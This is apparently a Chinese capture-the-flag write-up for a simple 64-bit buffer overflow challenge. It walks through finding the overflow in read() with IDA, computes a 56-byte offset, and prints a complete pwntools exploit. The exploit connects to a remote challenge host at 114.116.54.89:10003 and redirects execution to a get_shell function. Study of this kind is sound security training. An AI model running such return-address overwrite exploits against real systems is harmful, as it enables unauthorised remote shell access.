无保护的64位程序

然后丢到IDA看看  F5查看伪代码

main函数后面还有一个get_shell的函数

在main函数中read存在栈溢出漏洞,我们可以填充一些无意义的字符,等到字符的缓冲区满了,函数要返回的时候,我们输入我们的get_shell函数的入口地址,那么系统就会执行我们的get_shell函数

问题在于我们要输入多少字符

双击read函数中间的&s

我们可以算一下需要偏移距离 0x08-(0x30)=0x38个字符 也就是十进制的56,往read函数填充56个字符,在输入get_shell的地址,系统就会执行get_shell函数

那么get_shell函数的地址是多少

构造exp

from pwn import *

r=remote('114.116.54.89',10003)

payload='a'*0x38+p64(0x400751)

r.sendline(payload)

r.interactive()

执行

最新文章

  1. 【初学者指南】在ASP.NET MVC 5中创建GridView
  2. MFC下打开选择文件夹并获取文件夹的绝对路径
  3. WPFTookit Chart 入门
  4. 【转】前端工程筹建NodeJs+gulp+bower
  5. babel6 的 export default bug
  6. 更新整理本人所有博文中提供的代码与工具(C++,2013.10)
  7. [杂谈] My Wikipedia
  8. 【 D3.js 入门系列 --- 4 】 如何使用scale(比例)
  9. Android音乐播放器的开发实例
  10. windows7添�windows2008R2域配置
  11. 架构设计:负载均衡层设计方案(6)——Nginx + Keepalived构建高可用的负载层
  12. kali2.0 系统自带截图功能
  13. HTML5学习之FileReader接口
  14. HDU 4099 Revenge of Fibonacci (数学+字典数)
  15. js基础——cssText
  16. Warning: The Copy Bundle Resources build phase contains this target's Info.plist file 'yintingting_baisi/Info.plist'.
  17. 记一次lvs-tunnel模式的故障分析(7)
  18. [DeeplearningAI笔记]改善深层神经网络_优化算法2.1_2.2_mini-batch梯度下降法
  19. SpringMVC中的适配器(适配者模式)
  20. 提高测试脚本复用性降低DOM结构引起路径变化的影响

热门文章

  1. 爬取编程常用词汇,保存为Excel
  2. JavaScript内置对象及常见API
  3. 模块基础实战之ATM和购物车系统分文件处理
  4. #3145. 「APIO 2019」桥梁
  5. 解决邮件发送错误:503 Error: need EHLO and AUTH first
  6. 网络聊天室---node.js中net网络模块TCP服务端与客户端的使用
  7. 正则表达式中的.*?和python中re.S参数的详解
  8. PHP7.1.X+wordpress+windows,安装Memcached服务
  9. go-数据结构
  10. 禁止页面被复制和禁止右键,一段样式一段JS就行了,无需复杂设定!